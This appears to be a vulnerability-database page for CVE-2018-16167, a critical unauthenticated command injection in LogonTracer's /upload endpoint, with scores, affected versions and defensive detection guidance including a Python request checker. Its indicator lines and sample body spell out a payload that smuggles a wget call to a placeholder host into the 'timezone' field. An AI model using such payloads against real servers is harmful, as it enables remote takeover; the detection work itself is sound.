CVE-2018-16167
published 2019-01-09

CVE-2018-16167: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

Priority: P1 · 90 · critical · 9.8 CVSS 3.0
CVSS 3.0 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 74.74% (99.4th percentile)

Affected

2 ranges

Vendor                      Product      Version range   Fixed in
jpcert                      logontracer  <= 1.2.0
jpcert_coordination_center  logontracer

Detection & IOCs (extracted from sources)

url: /upload
path: /upload
sigma
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
  • The exploit targets the POST /upload endpoint with a crafted 'timezone' parameter carrying a semicolon-delimited OS command injection payload (e.g., '1;<command>;'). Monitor for POST requests to /upload whose timezone field contains a semicolon.
  • The injection is delivered in an application/x-www-form-urlencoded POST body to /upload. The timezone parameter value begins with '1;', followed by the injected command and a trailing semicolon.
  • No authentication is required to exploit this vulnerability. Any unauthenticated POST to /upload with a malicious timezone value should be treated as an attack attempt.
  • The vulnerable parameter is 'timezone' in the POST body to /upload. The injection delimiter is a semicolon (;), which allows arbitrary OS command chaining after the numeric value (e.g., '1;<cmd>;'). This applies to LogonTracer 1.2.0 and earlier.
  • The logtype field is set to 'XML' in the exploit; this may be required for the vulnerable code path to be reached.
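A detection check for the request shape described above, written as an added example for this page (not code from LogonTracer or from any of the cited sources): it parses the form-urlencoded body of a POST to /upload and flags a 'timezone' value that carries a shell command separator, with a lower-severity finding for any value that is simply not numeric. Sample bodies are constructed; 'example.invalid' is a placeholder host.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs

# Request shape from this page: unauthenticated POST to /upload with a
# form-urlencoded body whose 'timezone' value is '1;<command>;' instead of a number.
SHELL_METACHARS = re.compile(r"[;&|`$\n]")
NUMERIC_TZ = re.compile(r"^-?\d+$")


@dataclass
class Finding:
    severity: str        # "high" for command separators, "low" for merely non-numeric
    timezone: str        # the decoded timezone value that triggered the finding
    logtype: Optional[str]


def inspect_upload_request(method: str, path: str, content_type: str, body: str) -> Optional[Finding]:
    """Return a Finding if the request matches the CVE-2018-16167 injection pattern, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/upload":
        return None
    if not content_type.lower().startswith("application/x-www-form-urlencoded"):
        return None
    params = parse_qs(body, keep_blank_values=True)   # percent-decodes '%3B' to ';'
    logtype = params.get("logtype", [None])[0]
    for tz in params.get("timezone", []):
        if SHELL_METACHARS.search(tz):
            return Finding("high", tz, logtype)
        if not NUMERIC_TZ.match(tz.strip()):
            return Finding("low", tz, logtype)
    return None


# Constructed sample request bodies (not captured traffic).
BENIGN_BODY = "logtype=XML&timezone=9"
SUSPICIOUS_BODY = "logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fexample.invalid%2F%3B"

if __name__ == "__main__":
    for body in (BENIGN_BODY, SUSPICIOUS_BODY):
        print(inspect_upload_request("POST", "/upload", "application/x-www-form-urlencoded", body))
```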

CVSS provenance

NVD v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 9.8 CRITICAL